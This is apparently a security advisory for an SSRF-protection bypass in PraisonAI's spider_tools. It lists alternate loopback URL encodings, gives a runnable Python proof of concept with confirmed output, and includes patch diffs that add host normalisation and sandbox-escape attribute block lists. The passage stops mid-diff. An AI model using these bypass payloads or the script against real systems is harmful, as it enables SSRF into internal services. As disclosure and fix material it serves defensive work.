PraisonAI spider_tools SSRF protection bypass via alternate loopback host encodings
Description
Summary
PraisonAI's spider_tools URL validation can be bypassed using alternate loopback host encodings.
The affected component is:
praisonaiagents/tools/spider_tools.py
The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as localhost and 127.0.0.1.
It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request.
As a result, URLs such as the following bypass the protection and still reach loopback services:
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
After the weak validation passes, scrape_page() calls requests.Session.get() on the attacker-controlled URL. This allows an attacker who can influence URLs passed to scrape_page, crawl, or extract_text to induce SSRF requests against loopback-only services.
This is a server-side request forgery protection bypass.
Details
The affected code is in:
praisonaiagents/tools/spider_tools.py
The vulnerable flow is:
attacker-controlled URL
-> spider_tools._validate_url(...)
-> weak exact-host blocklist check
-> validation passes for alternate loopback encodings
-> scrape_page(...)
-> requests.Session.get(attacker_url)
-> loopback service is reached
The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as:
localhost
127.0.0.1
However, equivalent loopback forms are not rejected before the request is made.
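To make the gap concrete, here is a minimal sketch of an exact-match check of this kind. `naive_validate_url` and `BLOCKED_HOSTS` are hypothetical stand-ins, not the shipped `_validate_url`; the sketch only mirrors the pattern described above: a literal blocklist, followed by `ipaddress.ip_address()` applied to the raw host string.

```python
import ipaddress
from urllib.parse import urlparse

# Hypothetical blocklist, modelled on the exact-string check described above.
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "0.0.0.0", "::1"}


def naive_validate_url(url: str) -> bool:
    """Hypothetical exact-match validator; returns True when the URL is allowed."""
    hostname = (urlparse(url).hostname or "").lower()
    if not hostname or hostname in BLOCKED_HOSTS:
        return False
    try:
        ip = ipaddress.ip_address(hostname)
    except ValueError:
        # Not a canonical IP literal, so the host is treated as an ordinary
        # domain name. Short, hex, and integer forms all end up here.
        return True
    return not (ip.is_private or ip.is_loopback or ip.is_reserved or ip.is_link_local)


for candidate in (
    "http://127.0.0.1:8765/",
    "http://localhost.:8765/",
    "http://127.1:8765/",
    "http://0x7f000001:8765/",
    "http://2130706433:8765/",
):
    print(candidate, "allowed" if naive_validate_url(candidate) else "blocked")
```

Only the canonical `127.0.0.1` form is rejected by this sketch. The other hosts are not valid input for `ipaddress.ip_address()`, so they fall through to the "ordinary domain name" branch even though the networking stack may later treat them as loopback.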
Confirmed bypass examples:
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation.
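The numeric forms can be checked directly with the standard library. The sketch below assumes a platform whose C `inet_aton()` accepts the classic short, octal, hexadecimal, and single-integer spellings (glibc on Linux does); `normalize_ipv4` is a helper name introduced here for illustration only.

```python
import ipaddress
import socket

ALTERNATE_FORMS = ["127.1", "0177.0.0.1", "0x7f000001", "2130706433"]


def normalize_ipv4(host: str) -> ipaddress.IPv4Address:
    """Parse a host string the way the classic C inet_aton() routine does."""
    packed = socket.inet_aton(host)  # raises OSError for non-numeric hosts
    return ipaddress.IPv4Address(packed)


for form in ALTERNATE_FORMS:
    address = normalize_ipv4(form)
    print(f"{form:>12} -> {address} loopback={address.is_loopback}")
```

`localhost.` is a different case: it is not numeric, and the trailing dot only marks the name as fully qualified, so resolvers typically treat it the same as `localhost`.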
The issue is not that spider_tools can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses.
PoC
The following PoC is non-destructive. It starts a local HTTP server on 127.0.0.1:8765, then sends several alternate loopback URL forms through the real spider_tools validation/fetch path.
The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made.
The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server.
Full PoC
#!/usr/bin/env python3
"""PoC for PraisonAI spider_tools localhost-alias SSRF bypass."""
from __future__ import annotations

import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path

REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai"
AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"
SPIDER_TOOLS = AGENTS_ROOT / "praisonaiagents/tools/spider_tools.py"


def verify_source() -> None:
    expected = [
        "def _validate_url",
        "requests.Session",
        ".get(",
    ]
    text = SPIDER_TOOLS.read_text(encoding="utf-8")
    for needle in expected:
        if needle not in text:
            raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER_TOOLS}")


class LocalHandler(BaseHTTPRequestHandler):
    hits: list[tuple[str, str | None]] = []
    body = b"LOCAL-SPIDER-SSRF-SECRET"

    def do_GET(self) -> None:  # noqa: N802
        self.__class__.hits.append((self.path, self.headers.get("Host")))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, format: str, *args) -> None:  # noqa: A003
        return


def main() -> int:
    if not SPIDER_TOOLS.exists():
        raise SystemExit("missing local PraisonAI source tree")
    verify_source()
    sys.path.insert(0, str(AGENTS_ROOT))

    # Import the real shipped implementation.
    #
    # Depending on the exact public API exposed by spider_tools.py,
    # use the exported scrape function available in the local version.
    # The important path is:
    #
    #   _validate_url(url)
    #     -> requests.Session.get(url)
    #
    import praisonaiagents.tools.spider_tools as spider_tools

    server = HTTPServer(("127.0.0.1", 8765), LocalHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()

    candidates = [
        "http://localhost.:8765/",
        "http://127.1:8765/",
        "http://0177.0.0.1:8765/",
        "http://0x7f000001:8765/",
        "http://2130706433:8765/",
    ]

    try:
        for url in candidates:
            LocalHandler.hits.clear()
            try:
                # Prefer the real public scraping API when available.
                if hasattr(spider_tools, "scrape_page"):
                    result = spider_tools.scrape_page(url)
                elif hasattr(spider_tools, "extract_text"):
                    result = spider_tools.extract_text(url)
                elif hasattr(spider_tools, "crawl"):
                    result = spider_tools.crawl(url)
                else:
                    raise RuntimeError("No expected spider_tools public fetch function found")

                reached = bool(LocalHandler.hits)
                contains_secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result)
                print(f"{url} passed=True reached_loopback={reached} contains_secret={contains_secret}")
                if not reached:
                    raise SystemExit(f"[poc] MISS: {url} did not reach loopback server")
            except Exception as exc:
                print(f"{url} blocked_or_failed={type(exc).__name__}: {exc}")
                raise
    finally:
        server.shutdown()
        server.server_close()
        thread.join(timeout=1)

    print("[poc] HIT: alternate loopback URL forms bypassed spider_tools SSRF protection")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
Confirmed local result
The following bypasses were confirmed locally:
localhost. True ok ok local hit
127.1 True ok ok local hit
0177.0.0.1 True ok ok local hit
0x7f000001 True ok ok local hit
2130706433 True ok ok local hit
This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service.
Expected secure behavior
All loopback-equivalent addresses should be blocked before the HTTP request is made.
Examples that should be rejected:
http://localhost/
http://localhost./
http://127.0.0.1/
http://127.1/
http://0177.0.0.1/
http://0x7f000001/
http://2130706433/
http://[::1]/
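One way to get this behavior is to normalize the host first and make the allow/deny decision on the resulting IP address rather than on the string. The following is a sketch under stated assumptions, not the project's patch: `is_url_allowed`, `system_resolver`, and the injectable `resolver` parameter are names invented here, and the numeric parsing again relies on the platform's `inet_aton()`.

```python
from __future__ import annotations

import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlparse

Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> list[str]:
    """Resolve a host name to every address the OS returns for it."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def _is_internal(ip: ipaddress.IPv4Address | ipaddress.IPv6Address) -> bool:
    return (
        ip.is_loopback or ip.is_private or ip.is_link_local
        or ip.is_reserved or ip.is_unspecified or ip.is_multicast
    )


def is_url_allowed(url: str, resolver: Resolver = system_resolver) -> bool:
    """Hypothetical validator: allow only http(s) URLs whose host is public."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    host = parsed.hostname.lower().rstrip(".")  # "localhost." -> "localhost"
    if not host or host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        # inet_aton handles canonical and legacy IPv4 spellings alike:
        # "127.0.0.1", "127.1", "0177.0.0.1", "0x7f000001", "2130706433".
        literal = ipaddress.IPv4Address(socket.inet_aton(host))
    except (OSError, ValueError):
        try:
            literal = ipaddress.ip_address(host)  # IPv6 literals such as "::1"
        except ValueError:
            literal = None
    if literal is not None:
        return not _is_internal(literal)
    try:
        # Ordinary names: every resolved address must be public.
        addresses = [ipaddress.ip_address(addr) for addr in resolver(host)]
    except (OSError, ValueError):
        return False  # fail closed when resolution or parsing fails
    return bool(addresses) and not any(_is_internal(ip) for ip in addresses)
```

Passing the resolver as a parameter keeps the check testable without network access. A check of this kind still runs before the request, so it does not by itself cover redirects or a client that resolves the name again when connecting.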
Actual vulnerable behavior
Several alternate loopback representations pass validation and are fetched by the tool.
Impact
An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services.
Potential impact includes:
- SSRF against localhost-only admin panels or development servers;
- access to local HTTP services that are not intended to be reachable remotely;
- retrieval of local service responses into the agent/tool output;
- possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment.
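When testing a validator for the last case, it can help to generate the same kinds of alternate spellings for other sensitive addresses. The helper below is a hypothetical test-data generator (`alternate_encodings` is not part of PraisonAI); whether any of these forms actually passes a given validator or is accepted by a given HTTP client depends on the deployment and was not tested in this report.

```python
from __future__ import annotations

import ipaddress


def alternate_encodings(dotted: str) -> dict[str, str]:
    """Return integer, hex, and octal-dotted spellings of an IPv4 address."""
    value = int(ipaddress.IPv4Address(dotted))
    octets = dotted.split(".")
    return {
        "integer": str(value),
        "hex": hex(value),
        "octal_dotted": ".".join(f"0{int(octet):o}" for octet in octets),
    }


# 169.254.169.254 is the link-local address commonly used by cloud metadata services.
print(alternate_encodings("169.254.169.254"))
```

Feeding each generated spelling into the URL validator under test gives a quick regression check that non-canonical forms of an internal address are rejected along with the canonical one.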
The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings.
This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PraisonAI's spider_tools URL validation bypass allows SSRF to loopback services via alternate host encodings.
Vulnerability
The vulnerability resides in praisonaiagents/tools/spider_tools.py in PraisonAI. The _validate_url function only blocks exact strings like localhost and 127.0.0.1 but does not normalize or resolve hostnames. Alternate loopback encodings such as localhost., 127.1, 0177.0.0.1, 0x7f000001, and 2130706433 bypass validation [1][2].
Exploitation
An attacker who can influence URLs passed to scrape_page, crawl, or extract_text can provide a URL using an alternate loopback encoding (e.g., http://127.1:8765/). The weak validation passes, and requests.Session.get() makes a request to the loopback service [1][2].
Impact
Successful exploitation allows the attacker to perform Server-Side Request Forgery (SSRF) against loopback-only services, potentially accessing internal services or sensitive data [1][2].
Mitigation
The affected-packages table lists praisonaiagents 1.6.40 and PraisonAI 4.6.40 as patched versions. Developers should update to a patched version, or implement additional URL normalization and IP validation before requests [1][2].
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| praisonaiagents (PyPI) | < 1.6.40 | 1.6.40 |
| PraisonAI (PyPI) | < 4.6.40 | 4.6.40 |
Affected products: 2
Patches
2179cab02dbec refactor: harden input validation and access controls
19 files changed · +425 −100
.github/workflows/claude.yml+5 −2 modified@@ -181,12 +181,15 @@ jobs: - name: Fetch PR branch and Setup Remote if: github.event.issue.pull_request + env: + PR_BRANCH: ${{ steps.check_fork.outputs.pr_branch }} + IS_FORK: ${{ steps.check_fork.outputs.is_fork }} run: | # Fetch PR head from base repo and put it into local branch - git fetch origin pull/${{ github.event.issue.number }}/head:${{ steps.check_fork.outputs.pr_branch }} + git fetch origin pull/${{ github.event.issue.number }}/head:"${PR_BRANCH}" # If it's a fork, make origin point to local to trick claude-code-action's `git fetch origin <branch>` - if [ "${{ steps.check_fork.outputs.is_fork }}" == "true" ]; then + if [ "${IS_FORK}" = "true" ]; then git remote set-url origin file://$(pwd) fi
src/praisonai-agents/praisonaiagents/tools/mentions.py +5 −0 modified
@@ -268,6 +268,11 @@ def _process_rule_mention(self, rule_name: str) -> Optional[str]:
     def _process_url_mention(self, url: str) -> Optional[str]:
         """Process @url:https://... mention."""
         try:
+            from praisonaiagents.tools.spider_tools import SpiderTools
+
+            if not SpiderTools()._validate_url(url):
+                return f"# URL: {url}\n[Blocked: URL is not allowed]"
+
             import urllib.request
             req = urllib.request.Request(
src/praisonai-agents/praisonaiagents/tools/python_tools.py+55 −48 modified@@ -36,6 +36,30 @@ def _safe_getattr(obj, name, *default): return getattr(obj, name, *default) if default else getattr(obj, name) +_SANDBOX_BLOCKED_ATTRS = frozenset({ + '__subclasses__', '__bases__', '__mro__', '__globals__', + '__code__', '__class__', '__dict__', '__builtins__', + '__import__', '__loader__', '__spec__', '__init_subclass__', + '__set_name__', '__reduce__', '__reduce_ex__', + '__traceback__', '__qualname__', '__module__', + '__wrapped__', '__closure__', '__annotations__', + '__self__', # C builtins leak real builtins module (GHSA-4mr5-g6f9-cfrh) + # Frame/code object introspection + 'gi_frame', 'gi_code', 'cr_frame', 'cr_code', + 'ag_frame', 'ag_code', 'tb_frame', 'tb_next', + 'f_globals', 'f_locals', 'f_builtins', 'f_code', + 'co_consts', 'co_names', + '__getattribute__', '__getattr__', '__setattr__', '__delattr__', + '__dir__', '__get__', '__set__', '__delete__', +}) + +_SANDBOX_BLOCKED_CALLS = frozenset({ + 'exec', 'eval', 'compile', '__import__', + 'open', 'input', 'breakpoint', + 'setattr', 'delattr', 'dir', 'vars', +}) + + def _validate_code_ast(code: str): """Validate code using AST — catches attacks that bypass text checks. 
@@ -48,52 +72,33 @@ def _validate_code_ast(code: str): except SyntaxError: return None # let compile() handle syntax errors later - # Dangerous dunder attributes attackers use for sandbox escape - _blocked_attrs = frozenset({ - '__subclasses__', '__bases__', '__mro__', '__globals__', - '__code__', '__class__', '__dict__', '__builtins__', - '__import__', '__loader__', '__spec__', '__init_subclass__', - '__set_name__', '__reduce__', '__reduce_ex__', - '__traceback__', '__qualname__', '__module__', - '__wrapped__', '__closure__', '__annotations__', - # Frame/code object introspection - 'gi_frame', 'gi_code', 'cr_frame', 'cr_code', - 'ag_frame', 'ag_code', 'tb_frame', 'tb_next', - 'f_globals', 'f_locals', 'f_builtins', 'f_code', - 'co_consts', 'co_names', - '__getattribute__', '__getattr__', '__setattr__', '__delattr__', - '__dir__', '__get__', '__set__', '__delete__', - }) - for node in ast.walk(tree): # Block import statements if isinstance(node, (ast.Import, ast.ImportFrom)): return f"Import statements are not allowed" # Block attribute access to dangerous dunders if isinstance(node, ast.Attribute): - if node.attr in _blocked_attrs: + if node.attr in _SANDBOX_BLOCKED_ATTRS: return ( f"Access to attribute '{node.attr}' is restricted" ) - # Block calls to dangerous builtins by name + # Block calls to dangerous builtins (bare name or attribute access) if isinstance(node, ast.Call): func = node.func - if isinstance(func, ast.Name) and func.id in ( - 'exec', 'eval', 'compile', '__import__', - 'open', 'input', 'breakpoint', - 'setattr', 'delattr', 'dir', - ): + if isinstance(func, ast.Name) and func.id in _SANDBOX_BLOCKED_CALLS: return f"Call to '{func.id}' is not allowed" + if isinstance(func, ast.Attribute) and func.attr in _SANDBOX_BLOCKED_CALLS: + return f"Call to '{func.attr}' is not allowed" # Block dangerous constants (strings containing dunders) # Fallback for Python 3.7 ast.Str if isinstance(node, ast.Constant) and isinstance(node.value, str): - if any(attr in 
node.value for attr in _blocked_attrs): + if any(attr in node.value for attr in _SANDBOX_BLOCKED_ATTRS): return f"String constant contains restricted attribute name" elif type(node).__name__ == 'Str': - if any(attr in getattr(node, 's', '') for attr in _blocked_attrs): + if any(attr in getattr(node, 's', '') for attr in _SANDBOX_BLOCKED_ATTRS): return f"String constant contains restricted attribute name" return None @@ -112,7 +117,16 @@ def _execute_code_sandboxed( """ if limits is None: limits = ResourceLimits.minimal() - + + ast_error = _validate_code_ast(code) + if ast_error: + return { + 'result': None, + 'stdout': '', + 'stderr': f'Security Error: {ast_error}', + 'success': False, + } + try: # Create temporary file for the code with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f: @@ -151,21 +165,8 @@ def safe_execute(): }} # Block dangerous patterns - blocked_attrs = {{ - '__subclasses__', '__bases__', '__mro__', '__globals__', - '__code__', '__class__', '__dict__', '__builtins__', - '__import__', '__loader__', '__spec__', '__init_subclass__', - '__set_name__', '__reduce__', '__reduce_ex__', - '__traceback__', '__qualname__', '__module__', - '__wrapped__', '__closure__', '__annotations__', - # Frame/code object introspection - 'gi_frame', 'gi_code', 'cr_frame', 'cr_code', - 'ag_frame', 'ag_code', 'tb_frame', 'tb_next', - 'f_globals', 'f_locals', 'f_builtins', 'f_code', - 'co_consts', 'co_names', - '__getattribute__', '__getattr__', '__setattr__', '__delattr__', - '__dir__', '__get__', '__set__', '__delete__', - }} + blocked_attrs = {set(_SANDBOX_BLOCKED_ATTRS)!r} + blocked_calls = {set(_SANDBOX_BLOCKED_CALLS)!r} for node in ast.walk(tree): if isinstance(node, (ast.Import, ast.ImportFrom)): @@ -182,14 +183,20 @@ def safe_execute(): "stderr": f"Access to attribute '{{node.attr}}' is restricted", "success": False }} - if isinstance(node, ast.Call) and isinstance(node.func, ast.Name): - if node.func.id in ('exec', 'eval', 'compile', 
'__import__', - 'open', 'input', 'breakpoint', - 'setattr', 'delattr', 'dir'): + if isinstance(node, ast.Call): + func = node.func + if isinstance(func, ast.Name) and func.id in blocked_calls: + return {{ + "result": None, + "stdout": "", + "stderr": f"Call to '{{func.id}}' is not allowed", + "success": False + }} + if isinstance(func, ast.Attribute) and func.attr in blocked_calls: return {{ "result": None, "stdout": "", - "stderr": f"Call to '{{node.func.id}}' is not allowed", + "stderr": f"Call to '{{func.attr}}' is not allowed", "success": False }} if isinstance(node, ast.Constant) and isinstance(node.value, str): @@ -481,7 +488,7 @@ def _execute_code_direct( '__import__', 'import ', 'from ', 'exec', 'eval', 'compile', 'open(', 'file(', 'input(', 'raw_input', '__subclasses__', '__bases__', '__globals__', '__code__', - '__class__', 'globals(', 'locals(', 'vars(' + '__class__', '__self__', 'globals(', 'locals(', 'vars(' ] code_lower = code.lower()
src/praisonai-agents/praisonaiagents/tools/spider_tools.py +46 −24 modified
@@ -11,6 +11,8 @@
 """
 import logging
+import ipaddress
+import socket
 from typing import List, Dict, Union, Optional, Any
 from importlib import util
 import json
@@ -20,6 +22,48 @@
 import hashlib
 import time
+
+def _host_is_blocked(hostname: str) -> bool:
+    """Return True when hostname resolves to loopback/private/internal targets."""
+    if not hostname:
+        return True
+    host = hostname.lower().rstrip(".")
+    if host in ("localhost", "0.0.0.0", "::1") or host.endswith(".localhost"):
+        return True
+    if host in ("169.254.169.254", "metadata.google.internal"):
+        return True
+    if any(host.endswith(suffix) for suffix in (".local", ".internal", ".localdomain")):
+        return True
+
+    def _ip_blocked(ip: ipaddress._BaseAddress) -> bool:
+        return bool(
+            ip.is_private or ip.is_loopback or ip.is_reserved or ip.is_link_local
+        )
+
+    if host.isdigit():
+        try:
+            return _ip_blocked(ipaddress.ip_address(int(host)))
+        except (ValueError, OverflowError):
+            return True
+
+    if host.startswith("0x"):
+        try:
+            return _ip_blocked(ipaddress.ip_address(int(host, 16)))
+        except (ValueError, OverflowError):
+            return True
+
+    try:
+        return _ip_blocked(ipaddress.ip_address(host))
+    except ValueError:
+        pass
+
+    try:
+        return _ip_blocked(ipaddress.ip_address(socket.inet_aton(host)))
+    except OSError:
+        pass
+
+    return False
+
 class SpiderTools:
     """Tools for web scraping and crawling."""
@@ -59,31 +103,9 @@ def _validate_url(self, url: str) -> bool:
             if not parsed.hostname:
                 return False
-            # Reject local/internal addresses
-            hostname = parsed.hostname.lower()
-
-            # Block localhost and loopback
-            if hostname in ['localhost', '127.0.0.1', '0.0.0.0', '::1']:
-                return False
-
-            # Block private IP ranges
-            import ipaddress
-            try:
-                ip = ipaddress.ip_address(hostname)
-                if ip.is_private or ip.is_reserved or ip.is_loopback or ip.is_link_local:
-                    return False
-            except ValueError:
-                # Not an IP address, continue with domain validation
-                pass
-
-            # Block common internal domains
-            if any(hostname.endswith(domain) for domain in ['.local', '.internal', '.localdomain']):
-                return False
-
-            # Block metadata service endpoints
-            if hostname in ['169.254.169.254', 'metadata.google.internal']:
+            if _host_is_blocked(parsed.hostname):
                 return False
-
+
             return True
         except Exception:
src/praisonai-agents/tests/unit/tools/test_mentions_url_ssrf.py +10 −0 added
@@ -0,0 +1,10 @@
+"""@url mentions must not fetch loopback targets."""
+
+from praisonaiagents.tools.mentions import MentionsParser
+
+
+def test_url_mention_blocks_loopback():
+    parser = MentionsParser()
+    result = parser._process_url_mention("http://127.0.0.1:8765/")
+    assert result is not None
+    assert "Blocked" in result
src/praisonai-agents/tests/unit/tools/test_python_tools_sandbox.py+16 −0 modified@@ -112,6 +112,22 @@ def test_dunder_import_blocked(self, sandbox): result = sandbox.run("__import__('os')") assert result["success"] is False + def test_print_self_blocked(self, sandbox): + """print.__self__ leaks real builtins module (GHSA-4mr5-g6f9-cfrh).""" + result = sandbox.run("b = print.__self__") + assert result["success"] is False + assert "restricted" in result["stderr"].lower() + + def test_vars_call_blocked(self, sandbox): + """vars() can expose builtins.__dict__ after __self__ leak.""" + result = sandbox.run("vars({})") + assert result["success"] is False + + def test_attribute_dunder_call_blocked(self, sandbox): + """Attribute calls bypass bare-name Call checks.""" + result = sandbox.run("(1).__class__.__mro__") + assert result["success"] is False + # ── Legitimate Code (all must PASS) ─────────────────────────────────────────
src/praisonai-agents/tests/unit/tools/test_spider_url_validation.py +10 −0 modified
@@ -38,6 +38,16 @@ def test_still_blocks_loopback():
     assert spider._validate_url("http://localhost/") is False
+def test_blocks_alternate_loopback_encodings():
+    """GHSA-5c6w-wwfq-7qqm: non-canonical loopback host forms."""
+    spider = SpiderTools()
+    assert spider._validate_url("http://localhost.:8765/") is False
+    assert spider._validate_url("http://127.1:8765/") is False
+    assert spider._validate_url("http://0177.0.0.1:8765/") is False
+    assert spider._validate_url("http://0x7f000001:8765/") is False
+    assert spider._validate_url("http://2130706433:8765/") is False
+
+
 def test_rejects_non_string_input():
     spider = SpiderTools()
     assert spider._validate_url(None) is False  # type: ignore[arg-type]
src/praisonai-platform/praisonai_platform/api/deps.py+36 −0 modified@@ -71,3 +71,39 @@ async def require_workspace_member( ) user.workspace_id = workspace_id return user + + +async def require_workspace_admin( + workspace_id: str, + user: AuthIdentity = Depends(get_current_user), + session: AsyncSession = Depends(get_db), +) -> AuthIdentity: + """Require admin or owner role in the workspace.""" + return await require_workspace_member( + workspace_id, user, session, min_role="admin" + ) + + +async def require_workspace_owner( + workspace_id: str, + user: AuthIdentity = Depends(get_current_user), + session: AsyncSession = Depends(get_db), +) -> AuthIdentity: + """Require owner role in the workspace.""" + return await require_workspace_member( + workspace_id, user, session, min_role="owner" + ) + + +def ensure_resource_in_workspace( + resource_workspace_id: str | None, + workspace_id: str, + *, + label: str = "Resource", +) -> None: + """Reject cross-workspace access (IDOR) with a generic 404.""" + if resource_workspace_id != workspace_id: + raise HTTPException( + status_code=status.HTTP_404_NOT_FOUND, + detail=f"{label} not found", + )
src/praisonai-platform/praisonai_platform/api/routes/agents.py+7 −1 modified@@ -9,7 +9,7 @@ from praisonaiagents.auth import AuthIdentity -from ..deps import get_db, require_workspace_member +from ..deps import ensure_resource_in_workspace, get_db, require_workspace_member from ..schemas import AgentCreate, AgentResponse, AgentUpdate from ...services.agent_service import AgentService @@ -61,6 +61,7 @@ async def get_agent( agent = await svc.get(agent_id) if agent is None: raise HTTPException(status_code=404, detail="Agent not found") + ensure_resource_in_workspace(agent.workspace_id, workspace_id, label="Agent") return AgentResponse.model_validate(agent) @@ -84,6 +85,7 @@ async def update_agent( ) if agent is None: raise HTTPException(status_code=404, detail="Agent not found") + ensure_resource_in_workspace(agent.workspace_id, workspace_id, label="Agent") return AgentResponse.model_validate(agent) @@ -95,6 +97,10 @@ async def delete_agent( session: AsyncSession = Depends(get_db), ): svc = AgentService(session) + agent = await svc.get(agent_id) + if agent is None: + raise HTTPException(status_code=404, detail="Agent not found") + ensure_resource_in_workspace(agent.workspace_id, workspace_id, label="Agent") deleted = await svc.delete(agent_id) if not deleted: raise HTTPException(status_code=404, detail="Agent not found")
src/praisonai-platform/praisonai_platform/api/routes/issues.py+17 −1 modified@@ -9,7 +9,7 @@ from praisonaiagents.auth import AuthIdentity -from ..deps import get_db, require_workspace_member +from ..deps import ensure_resource_in_workspace, get_db, require_workspace_member from ..schemas import ( CommentCreate, CommentResponse, @@ -90,6 +90,7 @@ async def get_issue( issue = await svc.get(issue_id) if issue is None: raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") return IssueResponse.model_validate(issue) @@ -114,6 +115,7 @@ async def update_issue( ) if issue is None: raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") act_svc = ActivityService(session) await act_svc.log( workspace_id, "issue.updated", "issue", issue.id, @@ -132,6 +134,10 @@ async def delete_issue( session: AsyncSession = Depends(get_db), ): svc = IssueService(session) + issue = await svc.get(issue_id) + if issue is None: + raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") deleted = await svc.delete(issue_id) if not deleted: raise HTTPException(status_code=404, detail="Issue not found") @@ -148,6 +154,11 @@ async def add_comment( user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): + issue_svc = IssueService(session) + issue = await issue_svc.get(issue_id) + if issue is None: + raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") svc = CommentService(session) comment = await svc.create( issue_id=issue_id, @@ -166,6 +177,11 @@ async def list_comments( user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): + issue_svc = IssueService(session) + 
issue = await issue_svc.get(issue_id) + if issue is None: + raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") svc = CommentService(session) comments = await svc.list_for_issue(issue_id) return [CommentResponse.model_validate(c) for c in comments]
src/praisonai-platform/praisonai_platform/api/routes/workspaces.py+55 −6 modified@@ -9,7 +9,13 @@ from praisonaiagents.auth import AuthIdentity -from ..deps import get_current_user, get_db, require_workspace_member +from ..deps import ( + get_current_user, + get_db, + require_workspace_admin, + require_workspace_member, + require_workspace_owner, +) from ..schemas import ( MemberAdd, MemberResponse, @@ -64,7 +70,7 @@ async def get_workspace( async def update_workspace( workspace_id: str, body: WorkspaceUpdate, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): ws_svc = WorkspaceService(session) @@ -77,7 +83,7 @@ async def update_workspace( @router.delete("/{workspace_id}", status_code=status.HTTP_204_NO_CONTENT) async def delete_workspace( workspace_id: str, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_owner), session: AsyncSession = Depends(get_db), ): ws_svc = WorkspaceService(session) @@ -93,10 +99,16 @@ async def delete_workspace( async def add_member( workspace_id: str, body: MemberAdd, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + if body.role == "owner": + if not await member_svc.has_role(workspace_id, user.id, "owner"): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can add another owner", + ) member = await member_svc.add(workspace_id, body.user_id, body.role) return MemberResponse.model_validate(member) @@ -117,10 +129,32 @@ async def update_member_role( workspace_id: str, user_id: str, body: MemberUpdate, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + 
target = await member_svc.get(workspace_id, user_id) + if target is None: + raise HTTPException(status_code=404, detail="Member not found") + if user_id == user.id and body.role != target.role: + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Cannot change your own role", + ) + if body.role == "owner" and not await member_svc.has_role( + workspace_id, user.id, "owner" + ): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can assign the owner role", + ) + if target.role == "owner" and not await member_svc.has_role( + workspace_id, user.id, "owner" + ): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can change an owner's role", + ) member = await member_svc.update_role(workspace_id, user_id, body.role) if member is None: raise HTTPException(status_code=404, detail="Member not found") @@ -131,10 +165,25 @@ async def update_member_role( async def remove_member( workspace_id: str, user_id: str, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + if user_id == user.id: + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Cannot remove yourself from the workspace", + ) + target = await member_svc.get(workspace_id, user_id) + if target is None: + raise HTTPException(status_code=404, detail="Member not found") + if target.role == "owner" and not await member_svc.has_role( + workspace_id, user.id, "owner" + ): + raise HTTPException( + 